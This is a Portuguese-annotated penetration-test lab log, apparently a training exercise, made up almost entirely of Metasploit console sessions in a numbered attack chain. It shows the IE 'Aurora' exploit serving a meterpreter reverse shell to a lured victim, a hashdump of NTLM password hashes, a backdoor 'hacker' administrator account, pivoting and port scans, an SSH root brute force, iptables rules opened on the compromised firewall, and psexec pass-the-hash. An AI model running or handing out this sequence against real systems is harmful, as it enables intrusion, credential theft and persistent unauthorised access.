1- Realização de testes para verificar as Regras de firewall - utilização do nmap e visualização do /var/log/messages. Verificar também o acesso remoto do firewall
2- Atacante cria site com malware usando o exploit "aurora" - Cliente XP acessa site e recebe meterpreter. O cliente deve ser convencido a clicar no link (engenharia social ou comprometimento de sites famosos)
msf > search aurora
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set PAYLOAD
set PAYLOAD generic/custom set PAYLOAD windows/patchupmeterpreter/bind_nonx_tcp
set PAYLOAD generic/debug_trap set PAYLOAD windows/patchupmeterpreter/bind_tcp
set PAYLOAD generic/shell_bind_tcp set PAYLOAD windows/patchupmeterpreter/reverse_ipv6_tcp
set PAYLOAD generic/shell_reverse_tcp set PAYLOAD windows/patchupmeterpreter/reverse_nonx_tcp
set PAYLOAD generic/tight_loop set PAYLOAD windows/patchupmeterpreter/reverse_ord_tcp
set PAYLOAD windows/dllinject/bind_ipv6_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp
set PAYLOAD windows/dllinject/bind_nonx_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp_allports
set PAYLOAD windows/dllinject/bind_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp_dns
set PAYLOAD windows/dllinject/reverse_http set PAYLOAD windows/shell/bind_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_ipv6_tcp set PAYLOAD windows/shell/bind_nonx_tcp
set PAYLOAD windows/dllinject/reverse_nonx_tcp set PAYLOAD windows/shell/bind_tcp
set PAYLOAD windows/dllinject/reverse_ord_tcp set PAYLOAD windows/shell/reverse_http
set PAYLOAD windows/dllinject/reverse_tcp set PAYLOAD windows/shell/reverse_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_tcp_allports set PAYLOAD windows/shell/reverse_nonx_tcp
set PAYLOAD windows/dllinject/reverse_tcp_dns set PAYLOAD windows/shell/reverse_ord_tcp
set PAYLOAD windows/download_exec set PAYLOAD windows/shell/reverse_tcp
set PAYLOAD windows/exec set PAYLOAD windows/shell/reverse_tcp_allports
set PAYLOAD windows/loadlibrary set PAYLOAD windows/shell/reverse_tcp_dns
set PAYLOAD windows/messagebox set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/meterpreter/bind_ipv6_tcp set PAYLOAD windows/shell_bind_tcp_xpfw
set PAYLOAD windows/meterpreter/bind_nonx_tcp set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/speak_pwned
set PAYLOAD windows/meterpreter/reverse_http set PAYLOAD windows/upexec/bind_ipv6_tcp
set PAYLOAD windows/meterpreter/reverse_https set PAYLOAD windows/upexec/bind_nonx_tcp
set PAYLOAD windows/meterpreter/reverse_ipv6_tcp set PAYLOAD windows/upexec/bind_tcp
set PAYLOAD windows/meterpreter/reverse_nonx_tcp set PAYLOAD windows/upexec/reverse_http
set PAYLOAD windows/meterpreter/reverse_ord_tcp set PAYLOAD windows/upexec/reverse_ipv6_tcp
set PAYLOAD windows/meterpreter/reverse_tcp set PAYLOAD windows/upexec/reverse_nonx_tcp
set PAYLOAD windows/meterpreter/reverse_tcp_allports set PAYLOAD windows/upexec/reverse_ord_tcp
set PAYLOAD windows/meterpreter/reverse_tcp_dns set PAYLOAD windows/upexec/reverse_tcp
set PAYLOAD windows/metsvc_bind_tcp set PAYLOAD windows/upexec/reverse_tcp_allports
set PAYLOAD windows/metsvc_reverse_tcp set PAYLOAD windows/upexec/reverse_tcp_dns
set PAYLOAD windows/patchupdllinject/bind_ipv6_tcp set PAYLOAD windows/vncinject/bind_ipv6_tcp
set PAYLOAD windows/patchupdllinject/bind_nonx_tcp set PAYLOAD windows/vncinject/bind_nonx_tcp
set PAYLOAD windows/patchupdllinject/bind_tcp set PAYLOAD windows/vncinject/bind_tcp
set PAYLOAD windows/patchupdllinject/reverse_ipv6_tcp set PAYLOAD windows/vncinject/reverse_http
set PAYLOAD windows/patchupdllinject/reverse_nonx_tcp set PAYLOAD windows/vncinject/reverse_ipv6_tcp
set PAYLOAD windows/patchupdllinject/reverse_ord_tcp set PAYLOAD windows/vncinject/reverse_nonx_tcp
--More--
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set LHOST 172.16.49.200
LHOST => 172.16.49.200
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.49.200:443
[*] Using URL: http://0.0.0.0:80/5ogRS19
[*] Local IP: http://172.16.49.200:80/5ogRS19
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 172.16.50.40
[*] Sending stage (752128 bytes) to 172.16.50.40
[*] Meterpreter session 1 opened (172.16.49.200:443 -> 172.16.50.40:1032) at 2011-12-04 10:02:41 -0200
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
msf exploit(ms10_002_aurora) >
3- Atacante no cliente XP - faz sniffing, upload do plink, hashdump, verifica IP, processos e eleva privilégios (habilita GUI)
meterpreter > migrate 516
[*] Migrating to 516...
[*] Migration completed successfully.
meterpreter >
meterpreter > getpid
Current pid: 516
meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-h Help banner.
-r Upload recursively.
meterpreter > upload /pentest/windows-binaries/tools/plink.exe c:\\
[*] uploading : /pentest/windows-binaries/tools/plink.exe -> c:\
[*] uploaded : /pentest/windows-binaries/tools/plink.exe -> c:\\plink.exe
meterpreter > cd c:\
meterpreter > pwd
c:\
meterpreter > ls
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 211 fil 2007-10-31 22:10:02 -0200 boot.ini
100444/r--r--r-- 0 fil 2007-01-10 15:47:18 -0200 MSDOS.SYS
100444/r--r--r-- 0 fil 2007-01-10 15:47:18 -0200 IO.SYS
100444/r--r--r-- 250032 fil 2007-06-04 03:17:32 -0300 ntldr
100555/r-xr-xr-x 47564 fil 2007-06-04 03:17:32 -0300 NTDETECT.COM
100666/rw-rw-rw- 0 fil 2007-01-10 15:47:18 -0200 CONFIG.SYS
100666/rw-rw-rw- 603168768 fil 2011-12-04 09:40:33 -0200 pagefile.sys
100666/rw-rw-rw- 1024 fil 2007-05-10 05:17:55 -0300 .rnd
100777/rwxrwxrwx 0 fil 2007-01-10 15:47:18 -0200 AUTOEXEC.BAT
100777/rwxrwxrwx 229376 fil 2011-12-04 10:08:51 -0200 plink.exe
40555/r-xr-xr-x 0 dir 2009-07-21 19:28:52 -0300 Program Files
40777/rwxrwxrwx 0 dir 2007-10-24 22:06:10 -0200 found.000
40777/rwxrwxrwx 0 dir 2007-06-04 03:24:26 -0300 System Volume Information
40777/rwxrwxrwx 0 dir 2011-12-01 16:32:51 -0200 WINDOWS
40777/rwxrwxrwx 0 dir 2007-12-20 00:03:49 -0200 abilitywebserver
40777/rwxrwxrwx 0 dir 2007-03-22 15:51:15 -0300 Perl
40777/rwxrwxrwx 0 dir 2007-03-22 15:52:08 -0300 Python25
40777/rwxrwxrwx 0 dir 2007-10-31 21:31:05 -0200 found.001
40777/rwxrwxrwx 0 dir 2007-06-04 00:40:48 -0300 install
40777/rwxrwxrwx 0 dir 2011-08-05 20:27:02 -0300 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-21 19:32:08 -0300 Config.Msi
40777/rwxrwxrwx 0 dir 2007-01-10 11:51:19 -0200 RECYCLER
meterpreter > hashdump
Administrator:500:xxxx8fca1932ced5aad3b435b514xxxx:xxxxa5b26e6d1da1d7d96f38387bxxxx:::
cassio:1004:xxxx8fca1932ced5aad3b435b514xxxx:xxxxa5b26e6d1da1d7d96f38387bxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:05fa67eaec4d789ec4bd52f48e5a6b28:2733cdb0d8a1fec3f976f3b8ad1deeef:::
offsec:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0f7a50dd4b95cec4c1dea566f820f4e7:::
meterpreter >
meterpreter >
c:\> net user hacker hacker /add
c:\> net localgroup administrators hacker /add
4- Atacante faz pivoting no XP, arp-scan, scan. Descobre a existência de Ubuntu, Win2003 e respectivos serviços
meterpreter > background
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
msf exploit(ms10_002_aurora) > route add 172.16.50.0 255.255.255.0 1
[*] Route added
msf exploit(ms10_002_aurora) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
172.16.50.0 255.255.255.0 Session 1
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run arp_scanner -r 172.16.50.0/24
[*] ARP Scanning 172.16.50.0/24
[*] IP: 172.16.50.1 MAC 00:0c:29:54:45:f2
[*] IP: 172.16.50.40 MAC 00:0c:29:0a:57:88
meterpreter > run arp_scanner -r 172.16.50.0/24
[*] ARP Scanning 172.16.50.0/24
[*] IP: 172.16.50.1 MAC 00:0c:29:54:45:f2
[*] IP: 172.16.50.30 MAC 00:0c:29:89:a1:d8
[*] IP: 172.16.50.40 MAC 00:0c:29:0a:57:88
^Cmeterpreter >
meterpreter > back
[-] Unknown command: back.
meterpreter > background
msf exploit(ms10_002_aurora) > use auxiliary/scanner/po
use auxiliary/scanner/pop3/pop3_login
use auxiliary/scanner/pop3/pop3_version
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/postgres/postgres_hashdump
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > set ports 1-100
ports => 1-100
msf auxiliary(tcp) > set rhosts 172.16.50.1
rhosts => 172.16.50.1
msf auxiliary(tcp) > run
[*] 172.16.50.1:22 - TCP OPEN
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(tcp) > unset ports
Unsetting ports...
msf auxiliary(tcp) > set ports 1-500
ports => 1-500
msf auxiliary(tcp) > unset rhosts
Unsetting rhosts...
msf auxiliary(tcp) > set rhosts 172.16.50.30
rhosts => 172.16.50.30
msf auxiliary(tcp) > run
[*] 172.16.50.30:53 - TCP OPEN
[*] 172.16.50.30:139 - TCP OPEN
[*] 172.16.50.30:135 - TCP OPEN
[*] 172.16.50.30:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
5- Atacante faz força bruta (port forward) com hydra, descobre a senha e usa plink
msf auxiliary(tcp) > back
msf > search ssh
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal SSH Key Exchange Init Corruption
auxiliary/fuzzers/ssh/ssh_version_15 normal SSH 1.5 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_2 normal SSH 2.0 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_corrupt normal SSH Version Corruption
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
exploit/windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow
exploit/windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
post/multi/gather/ssh_creds normal Multi Gather OpenSSH PKI Credentials Collection
post/windows/gather/credentials/mremote normal Windows Gather mRemote Saved Password Extraction
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set RHOSTS 172.16.50.1
RHOSTS => 172.16.50.1
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/
.ICEauthority .gtk-recordmydesktop .subversion
.TrueCrypt .gvfs .thumbnails
.Xauthority .i2p .viminfo
.adobe .local .w3m
.aptitude .macromedia .wine
.armitage.prop .maltego .wireshark
.bash_history .mozilla .xchat2
.bashrc .mplayer .xsession-errors
.cache .msf3 Desktop
.config .msf4 FirePassword.zip
.dbus .nautilus a.out
.debtags .netbeans arq_dicionario.txt
.esd_auth .profile backdoor.exe
.gconf .pulse cassio
.gconfd .pulse-cookie cassio_orog.txt
.gem .purple dcom.c
.gnome2 .recently-used.xbel dhcpstarv-0.2.1
.gnome2_private .rnd resumo.tar.gz
.gstreamer-0.10 .selected_editor teste.arquivodocassio
.gtk-bookmarks .ssh
msf auxiliary(ssh_login) > set PASS_FILE /root/arq_dicionario.txt
PASS_FILE => /root/arq_dicionario.txt
msf auxiliary(ssh_login) > run
[*] 172.16.50.1:22 SSH - Starting bruteforce
[*] 172.16.50.1:22 SSH - [01/16] - Trying: username: 'root' with password: ''
[-] 172.16.50.1:22 SSH - [01/16] - Failed: 'root':''
[*] 172.16.50.1:22 SSH - [02/16] - Trying: username: 'root' with password: 'root'
[-] 172.16.50.1:22 SSH - [02/16] - Failed: 'root':'root'
[*] 172.16.50.1:22 SSH - [03/16] - Trying: username: 'root' with password: '#!comment: This list has been compiled by Solar Designer of Openwall Project,'
[-] 172.16.50.1:22 SSH - [03/16] - Failed: 'root':'#!comment: This list has been compiled by Solar Designer of Openwall Project,'
[*] 172.16.50.1:22 SSH - [04/16] - Trying: username: 'root' with password: '#!comment: http://www.openwall.com/wordlists/'
[-] 172.16.50.1:22 SSH - [04/16] - Failed: 'root':'#!comment: http://www.openwall.com/wordlists/'
[*] 172.16.50.1:22 SSH - [05/16] - Trying: username: 'root' with password: '#!comment:'
[-] 172.16.50.1:22 SSH - [05/16] - Failed: 'root':'#!comment:'
[*] 172.16.50.1:22 SSH - [06/16] - Trying: username: 'root' with password: '#!comment: This list is based on passwords most commonly seen on a set of Unix'
[-] 172.16.50.1:22 SSH - [06/16] - Failed: 'root':'#!comment: This list is based on passwords most commonly seen on a set of Unix'
[*] 172.16.50.1:22 SSH - [07/16] - Trying: username: 'root' with password: '#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[-] 172.16.50.1:22 SSH - [07/16] - Failed: 'root':'#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[*] 172.16.50.1:22 SSH - [08/16] - Trying: username: 'root' with password: '#!comment: (that is, more common passwords are listed first). It has been'
[-] 172.16.50.1:22 SSH - [08/16] - Failed: 'root':'#!comment: (that is, more common passwords are listed first). It has been'
[*] 172.16.50.1:22 SSH - [09/16] - Trying: username: 'root' with password: '#!comment: revised to also include common website passwords from public lists'
[-] 172.16.50.1:22 SSH - [09/16] - Failed: 'root':'#!comment: revised to also include common website passwords from public lists'
[*] 172.16.50.1:22 SSH - [10/16] - Trying: username: 'root' with password: '#!comment: of "top N passwords" from major community website compromises that'
[-] 172.16.50.1:22 SSH - [10/16] - Failed: 'root':'#!comment: of "top N passwords" from major community website compromises that'
[*] 172.16.50.1:22 SSH - [11/16] - Trying: username: 'root' with password: '#!comment: occurred in 2006 through 2009.'
[-] 172.16.50.1:22 SSH - [11/16] - Failed: 'root':'#!comment: occurred in 2006 through 2009.'
[*] 172.16.50.1:22 SSH - [12/16] - Trying: username: 'root' with password: '#!comment: Last update: 2010/01/11 (3158 entries)'
[-] 172.16.50.1:22 SSH - [12/16] - Failed: 'root':'#!comment: Last update: 2010/01/11 (3158 entries)'
[*] 172.16.50.1:22 SSH - [13/16] - Trying: username: 'root' with password: '12345'
[-] 172.16.50.1:22 SSH - [13/16] - Failed: 'root':'12345'
[*] 172.16.50.1:22 SSH - [14/16] - Trying: username: 'root' with password: 'abc123'
[-] 172.16.50.1:22 SSH - [14/16] - Failed: 'root':'abc123'
[*] 172.16.50.1:22 SSH - [15/16] - Trying: username: 'root' with password: 'password'
[*] Command shell session 2 opened (172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22) at 2011-12-04 10:30:13 -0200
[+] 172.16.50.1:22 SSH - [15/16] - Success: 'root':'password' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > back
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
msf >
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1004 created.
Channel 22 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 28BF-EFA1
Directory of c:\
05/10/2007 10:17 AM 1,024 .rnd
12/20/2007 04:03 AM <DIR> abilitywebserver
01/10/2007 07:47 PM 0 AUTOEXEC.BAT
01/10/2007 07:47 PM 0 CONFIG.SYS
08/06/2011 01:27 AM <DIR> Documents and Settings
06/04/2007 05:40 AM <DIR> install
03/22/2007 08:51 PM <DIR> Perl
12/04/2011 02:08 PM 229,376 plink.exe
07/22/2009 12:28 AM <DIR> Program Files
03/22/2007 08:52 PM <DIR> Python25
12/01/2011 08:32 PM <DIR> WINDOWS
4 File(s) 230,400 bytes
7 Dir(s) 866,496,512 bytes free
c:\>plink.exe -l root -pw password 172.16.50.1
plink.exe -l root -pw password 172.16.50.1
Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
Ubuntu 10.10
Welcome to Ubuntu!
* Documentation: https://help.ubuntu.com/
310 packages can be updated.
179 updates are security updates.
New release 'natty' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Dec 4 04:21:31 2011 from localhost.localdomain
root@ubuntu:~# whoami
whoami
root
root@ubuntu:~# ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:54:45:e8
inet addr:172.16.49.100 Bcast:172.16.49.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe54:45e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23370 errors:0 dropped:0 overruns:0 frame:0
TX packets:8784 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17677711 (17.6 MB) TX bytes:1879700 (1.8 MB)
Interrupt:19 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:54:45:f2
inet addr:172.16.50.1 Bcast:172.16.50.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe54:45f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12371 errors:0 dropped:0 overruns:0 frame:0
TX packets:19081 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2419075 (2.4 MB) TX bytes:17128185 (17.1 MB)
Interrupt:19 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:120 errors:0 dropped:0 overruns:0 frame:0
TX packets:120 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15232 (15.2 KB) TX bytes:15232 (15.2 KB)
root@ubuntu:~# iptables -L
iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- 172.16.50.0/24 anywhere tcp dpt:ssh
LOG all -- anywhere anywhere LOG level warning prefix `INPUT-DROP'
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere multiport dports ftp,www,https
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere
LOG all -- anywhere anywhere LOG level warning prefix `FORWARD-DROP'
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@ubuntu:~# iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
root@ubuntu:~# iptables -L
iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- 172.16.50.0/24 anywhere tcp dpt:ssh
LOG all -- anywhere anywhere LOG level warning prefix `INPUT-DROP'
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere multiport dports ftp,www,https
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere
LOG all -- anywhere anywhere LOG level warning prefix `FORWARD-DROP'
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@ubuntu:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter >
no BT5
root@bt:~# ssh root@172.16.49.100
The authenticity of host '172.16.49.100 (172.16.49.100)' can't be established.
RSA key fingerprint is fa:0a:b4:f9:48:a0:cf:99:1e:9e:a4:1b:56:5e:df:d2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.49.100' (RSA) to the list of known hosts.
root@172.16.49.100's password:
Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
Ubuntu 10.10
Welcome to Ubuntu!
* Documentation: https://help.ubuntu.com/
310 packages can be updated.
179 updates are security updates.
New release 'natty' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Dec 4 04:32:50 2011 from 172.16.50.40
root@ubuntu:~# whoami
root
root@ubuntu:~# exit
logout
Connection to 172.16.49.100 closed.
root@bt:~#
6- Atacante usa psexec para passthehash e entra em win2003 - eleva priv. habilita GUI
msf > search psexec
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > set RHOST 172.16.50.30
RHOST => 172.16.50.30
msf exploit(psexec) > set SMBUser
SMBUser =>
msf exploit(psexec) > unset SMBUser
Unsetting SMBUser...
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c
SMBPass => 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c
msf exploit(psexec) > set PAYLOAD
set PAYLOAD generic/custom
set PAYLOAD generic/debug_trap
set PAYLOAD generic/shell_bind_tcp
set PAYLOAD generic/shell_reverse_tcp
set PAYLOAD generic/tight_loop
set PAYLOAD windows/adduser
set PAYLOAD windows/dllinject/bind_ipv6_tcp
set PAYLOAD windows/dllinject/bind_nonx_tcp
set PAYLOAD windows/dllinject/bind_tcp
set PAYLOAD windows/dllinject/reverse_http
set PAYLOAD windows/dllinject/reverse_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_nonx_tcp
set PAYLOAD windows/dllinject/reverse_ord_tcp
set PAYLOAD windows/dllinject/reverse_tcp
set PAYLOAD windows/dllinject/reverse_tcp_allports
set PAYLOAD windows/dllinject/reverse_tcp_dns
set PAYLOAD windows/download_exec
set PAYLOAD windows/exec
set PAYLOAD windows/loadlibrary
set PAYLOAD windows/messagebox
set PAYLOAD windows/meterpreter/bind_ipv6_tcp
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set PAYLOAD windows/meterpreter/bind_tcp
set PAYLOAD windows/meterpreter/reverse_http
set PAYLOAD windows/meterpreter/reverse_https
--More--
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.50.30 yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 172.16.50.30 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating to 172.16.50.30:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \hunhdDhl.exe...
